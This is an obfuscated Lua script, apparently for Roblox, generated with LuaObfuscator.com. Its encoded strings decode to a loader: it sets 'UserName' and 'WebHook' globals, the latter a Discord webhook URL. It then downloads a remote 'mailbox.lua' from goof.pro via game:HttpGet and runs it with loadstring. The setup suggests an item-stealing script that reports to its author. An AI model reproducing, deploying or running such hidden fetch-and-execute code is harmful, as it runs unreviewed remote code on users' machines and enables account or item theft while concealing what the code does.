--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v80=v5(v68,v19);v19=nil;return v80;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==((1834 -(892 + 65)) -(282 + 595))) then v70=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-((2542 -1476) -(68 + (1842 -845))))) + (1271 -(226 + 1044)))) ;return v70-(v70%1) ;end end else local v71=0 -0 ;local v72;while true do if (v71==((1708 -777) -((1207 -(87 + 263)) + 74))) then v72=(570 -(367 + 201))^(v32-(928 -(214 + (893 -(67 + 113))))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v40 * (16778168 -(802 + 150))) + (v39 * (176444 -(80729 + 30179))) + (v38 * (464 -208)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=(1428 -(44 + 386)) -(915 + 82) ;local v44=(v20(v42,2 -1 ,12 + 8 ) * (2^(41 -9))) + v41 ;local v45=v20(v42,21,1218 -(1069 + 118) );local v46=((v20(v42,72 -40 )==(1 -0)) and  -1) or 1 ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else v45=792 -((1854 -(998 + 488)) + 423) ;v43=(0 + 0) -0 ;end elseif (v45==(2065 -(10 + 8))) then return ((v44==((0 + 0) -0)) and (v46 * ((443 -(416 + 26))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-((1212 -(201 + 571)) + 583) ) * (v43 + (v44/((3 -1)^((1628 -(116 + 1022)) -((603 -458) + 172 + 121))))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(859 -(814 + 45))) then return "";end end v48=1;end if (v48==(7 -4)) then return v6(v50);end if (v48==(1 + (1424 -(630 + 793)))) then v50={};for v81=1 + 0 , #v49 do v50[v81]=v2(v1(v3(v49,v81,v81)));end v48=888 -((884 -623) + 624) ;end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(1 -0) );v18=v18 + v47 ;v48=1082 -((4829 -3809) + 60) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==1) then local v73=0;while true do if (v73==0) then v54=nil;v55=nil;v73=1;end if (v73~=(1887 -(927 + 959))) then else v51=6 -4 ;break;end end end if (v51==(7 -4)) then local v74=0;while true do if (1==v74) then v51=3 + 1 ;break;end if (v74==(0 + 0)) then v58=nil;v59=nil;v74=98 -(11 + 86) ;end end end if (v51~=(10 -6)) then else while true do if (v52==(7 -4)) then v59=nil;while true do local v103=1551 -(1126 + 425) ;local v104;while true do if (v103~=0) then else v104=0 -0 ;while true do if (v104==(405 -(118 + 287))) then local v131=0 -0 ;local v132;while true do if (v131~=(1121 -(118 + 1003))) then else v132=0 -0 ;while true do if (v132==(377 -(142 + 235))) then local v160=0 -0 ;while true do if (v160==(1 + 0)) then v132=1 + 0 ;break;end if ((977 -(553 + 424))~=v160) then else if (v53==(1 -0)) then local v164=533 -(43 + 490) ;local v165;while true do if ((0 + 0)==v164) then v165=0 + 0 ;while true do if (v165==(2 + 0)) then v53=2;break;end if ((733 -(711 + 22))==v165) then local v170=0 + 0 ;local v171;while true do if ((0 + 0)~=v170) then else v171=0;while true do if (1==v171) then v165=860 -(240 + 619) ;break;end if (v171==0) then local v181=0 -0 ;while true do if (v181==(2 -1)) then v171=1 + 0 ;break;end if (v181==0) then v58=v23();v59={};v181=1;end end end end break;end end end if (v165==(2 -1)) then local v172=0 + 0 ;while true do if (v172==(0 -0)) then for v176=1,v58 do local v177=753 -(239 + 514) ;local v178;local v179;local v180;while true do if ((0 + 0)==v177) then v178=1329 -(797 + 532) ;v179=nil;v177=1 + 0 ;end if (v177==(3 -2)) then v180=nil;while true do if (v178~=(1739 -(404 + 1335))) then else local v183=0 + 0 ;while true do if (v183==0) then local v186=0 -0 ;while true do if (v186==(1203 -(373 + 829))) then v183=1;break;end if (v186==(0 + 0)) then v179=v21();v180=nil;v186=732 -(476 + 255) ;end end end if ((1131 -(369 + 761))==v183) then v178=1 + 0 ;break;end end end if ((1 -0)==v178) then if (v179==(338 -(10 + 327))) then v180=v21()~=0 ;elseif (v179==(3 -1)) then v180=v24();elseif (v179~=(241 -(64 + 174))) then else v180=v25();end v59[v176]=v180;break;end end break;end end end v57[1 + 2 ]=v21();v172=1;end if (v172==(1 -0)) then v165=2;break;end end end end break;end end end if (v53~=(338 -(144 + 192))) then else local v166=449 -(108 + 341) ;local v167;local v168;while true do if ((216 -(42 + 174))~=v166) then else v167=0 + 0 ;v168=nil;v166=4 -3 ;end if (v166~=(1 + 0)) then else while true do if (v167==(0 + 0)) then v168=1504 -(363 + 1141) ;while true do local v173=0;local v174;while true do if ((1580 -(1183 + 397))==v173) then v174=469 -(270 + 199) ;while true do if (v174~=0) then else if (v168~=(2 -1)) then else return v57;end if (v168==(0 + 0)) then local v182=0;while true do if (v182==(0 + 0)) then local v185=1819 -(580 + 1239) ;while true do if (v185==1) then v182=1;break;end if (v185==(0 -0)) then for v187=1 + 0 ,v23() do local v188=0 + 0 ;local v189;local v190;local v191;while true do if ((1976 -(1913 + 62))~=v188) then else v191=nil;while true do if (v189~=(0 + 0)) then else local v194=0 + 0 ;while true do if (1==v194) then v189=2 -1 ;break;end if (v194==(0 -0)) then v190=1933 -(565 + 1368) ;v191=nil;v194=3 -2 ;end end end if (v189==(1 + 0)) then while true do if (v190==0) then v191=v21();if (v20(v191,1168 -(645 + 522) ,1662 -(1477 + 184) )==(0 -0)) then local v195=0 + 0 ;local v196;local v197;local v198;local v199;local v200;while true do if (v195==1) then v198=nil;v199=nil;v195=858 -(564 + 292) ;end if (v195~=(2 + 0)) then else v200=nil;while true do if ((0 -0)==v196) then local v202=0 -0 ;while true do if ((1 -0)~=v202) then else v196=2 -1 ;break;end if ((304 -(244 + 60))==v202) then v197=0 -0 ;v198=nil;v202=1 + 0 ;end end end if (v196==(477 -(41 + 435))) then local v203=0;local v204;while true do if (v203==(1001 -(938 + 63))) then v204=0 + 0 ;while true do if (v204==1) then v196=2;break;end if (v204==(1125 -(936 + 189))) then local v213=0 + 0 ;while true do if (v213~=0) then else v199=nil;v200=nil;v213=1614 -(1565 + 48) ;end if (v213==(267 -(28 + 238))) then v204=1;break;end end end end break;end end end if (v196==(2 + 0)) then while true do if (v197~=2) then else local v205=1138 -(782 + 356) ;local v206;while true do if (v205==0) then v206=267 -(176 + 91) ;while true do if (v206==(0 -0)) then local v215=0;local v216;while true do if (0~=v215) then else v216=0 -0 ;while true do if (v216~=(1093 -(975 + 117))) then else v206=1 + 0 ;break;end if (v216==(0 + 0)) then local v219=0 + 0 ;while true do if (v219==(0 -0)) then if (v20(v199,1876 -(157 + 1718) ,1)~=(1 + 0)) then else v200[472 -(381 + 89) ]=v59[v200[2 + 0 ]];end if (v20(v199,2 + 0 ,2 -0 )==(1157 -(1074 + 82))) then v200[3]=v59[v200[3]];end v219=3 -2 ;end if (v219~=(3 -2)) then else v216=1456 -(990 + 465) ;break;end end end end break;end end end if (v206==1) then v197=1021 -(697 + 321) ;break;end end break;end end end if (v197==0) then local v207=0;while true do if (v207~=0) then else local v214=0 -0 ;while true do if ((1 + 0)==v214) then v207=1;break;end if (v214~=(0 -0)) then else v198=v20(v191,2,3);v199=v20(v191,1730 -(1668 + 58) ,13 -7 );v214=2 -1 ;end end end if (1==v207) then v197=1 + 0 ;break;end end end if (v197==(1 -0)) then local v208=0 + 0 ;local v209;while true do if (v208~=(0 -0)) then else v209=1227 -(322 + 905) ;while true do if ((611 -(602 + 9))~=v209) then else local v217=1189 -(449 + 740) ;while true do if (v217~=(872 -(826 + 46))) then else v200={v22(),v22(),nil,nil};if (v198==(1469 -(1269 + 200))) then local v218=0 + 0 ;while true do if (v218==0) then v200[3]=v22();v200[819 -(98 + 717) ]=v22();break;end end elseif (v198==(827 -(802 + 24))) then v200[5 -2 ]=v23();elseif (v198==(1900 -(260 + 1638))) then v200[443 -(382 + 58) ]=v23() -((6 -4)^16) ;elseif (v198==(3 + 0)) then local v228=0 -0 ;while true do if (v228==0) then v200[1 + 2 ]=v23() -((5 -3)^(1221 -(902 + 303))) ;v200[8 -4 ]=v22();break;end end end v217=3 -2 ;end if (v217~=(2 -1)) then else v209=1 + 0 ;break;end end end if (v209==(1 + 0)) then v197=2 + 0 ;break;end end break;end end end if (v197==(1693 -(1121 + 569))) then if (v20(v199,3,3)==(215 -(22 + 192))) then v200[1437 -(797 + 636) ]=v59[v200[687 -(483 + 200) ]];end v54[v187]=v200;break;end end break;end end break;end if (v195==(0 -0)) then local v201=1619 -(1427 + 192) ;while true do if (v201==(0 + 0)) then v196=0 -0 ;v197=nil;v201=1;end if (v201==(1464 -(1404 + 59))) then v195=1 + 0 ;break;end end end end end break;end end break;end end break;end if (v188==(0 -0)) then v189=0;v190=nil;v188=1 -0 ;end end end for v192=766 -(468 + 297) ,v23() do v55[v192-(1 + 0) ]=v28();end v185=1 + 0 ;end end end if (v182~=(563 -(334 + 228))) then else v168=3 -2 ;break;end end end break;end end break;end end end break;end end break;end end end v160=2 -1 ;end end end if (v132==(1 -0)) then v104=1807 -(1202 + 604) ;break;end end break;end end end if (v104~=1) then else if (v53==(0 -0)) then local v155=0 + 0 ;local v156;while true do if (v155==(0 -0)) then v156=0;while true do if (v156~=(236 -(141 + 95))) then else local v161=0 + 0 ;while true do if (v161==0) then v54={};v55={};v161=2 -1 ;end if (v161~=1) then else v156=2 -1 ;break;end end end if (v156==1) then local v162=0 + 0 ;local v163;while true do if (v162==(0 -0)) then v163=0 + 0 ;while true do if ((1 + 0)~=v163) then else v156=2 + 0 ;break;end if (v163~=0) then else local v169=0;while true do if (v169==(0 -0)) then v56={};v57={v54,v55,nil,v56};v169=1 -0 ;end if (1==v169) then v163=1773 -(1733 + 39) ;break;end end end end break;end end end if (v156==(2 + 0)) then v53=164 -(92 + 71) ;break;end end break;end end end break;end end break;end end end break;end if (v52~=1) then else local v100=1034 -(125 + 909) ;while true do if (v100==(1949 -(1096 + 852))) then v52=2;break;end if (v100~=(0 + 0)) then else local v109=0 + 0 ;while true do if (v109~=(1 -0)) then else v100=1;break;end if (v109==(765 -(574 + 191))) then v55=nil;v56=nil;v109=1;end end end end end if ((514 -(409 + 103))~=v52) then else local v101=236 -(46 + 190) ;local v102;while true do if ((95 -(51 + 44))==v101) then v102=0 + 0 ;while true do if (v102==(0 -0)) then local v127=0 + 0 ;while true do if (v127==(849 -(254 + 595))) then v57=nil;v58=nil;v127=1318 -(1114 + 203) ;end if ((127 -(55 + 71))==v127) then v102=1 -0 ;break;end end end if (v102~=(1791 -(573 + 1217))) then else v52=8 -5 ;break;end end break;end end end if (0~=v52) then else v53=0 + 0 ;v54=nil;v52=1 + 0 ;end end break;end if (v51~=(2 -0)) then else local v75=0;while true do if (v75==(940 -(714 + 225))) then v51=3;break;end if ((0 -0)==v75) then v56=nil;v57=nil;v75=1 -0 ;end end end if ((0 + 0)~=v51) then else local v76=0 -0 ;while true do if (v76==(806 -(118 + 688))) then v52=1269 -(231 + 1038) ;v53=nil;v76=1;end if (v76==(49 -(25 + 23))) then v51=1 + 0 ;break;end end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v83=v64;local v84=v65;local v85=v66;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=5) then if (v96<=2) then if (v96<=0) then local v110=v95[2];v93[v110]=v93[v110](v13(v93,v110 + 1 ,v88));elseif (v96==1) then v93[v95[2]]=v62[v95[3]];else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=3) then v87=v95[3];elseif (v96>4) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else do return;end end elseif (v96<=8) then if (v96<=6) then local v113;local v114,v115;local v116;local v117;v93[v95[2]]=v62[v95[3]];v87=v87 + 1 ;v95=v83[v87];v117=v95[2];v116=v93[v95[3]];v93[v117 + 1 ]=v116;v93[v117]=v116[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v95=v83[v87];v117=v95[2];v114,v115=v86(v93[v117](v13(v93,v117 + 1 ,v95[3])));v88=(v115 + v117) -1 ;v113=0;for v128=v117,v88 do v113=v113 + 1 ;v93[v128]=v114[v113];end v87=v87 + 1 ;v95=v83[v87];v117=v95[2];v93[v117]=v93[v117](v13(v93,v117 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];elseif (v96>7) then v93[v95[2]]=v95[3];else v93[v95[2]]();end elseif (v96<=10) then if (v96>9) then v62[v95[3]]=v93[v95[2]];else local v140=v95[2];local v141=v93[v95[3]];v93[v140 + 1 ]=v141;v93[v140]=v141[v95[4]];end elseif (v96>11) then local v145=v95[2];local v146,v147=v86(v93[v145](v13(v93,v145 + 1 ,v95[3])));v88=(v147 + v145) -1 ;local v148=0;for v153=v145,v88 do local v154=0;while true do if (v154==0) then v148=v148 + 1 ;v93[v153]=v146[v148];break;end end end else v62[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v62[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v87=v95[3];end v87=v87 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030E3O00547279546F52656163683O395403073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323438333036302O34323132353O31322F67664A3234576377376E764E556B536D70334C37364E384D6B37585241746E4F7471726C2D4D72713638545864523055383070454B566A38707464426E776249716D4F6500153O0012083O00013O0026053O000C000100020004033O000C0001001201000100033O001206000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026053O0001000100010004033O00010001001208000100083O00120B000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00043O00017O00",v9(),...);end
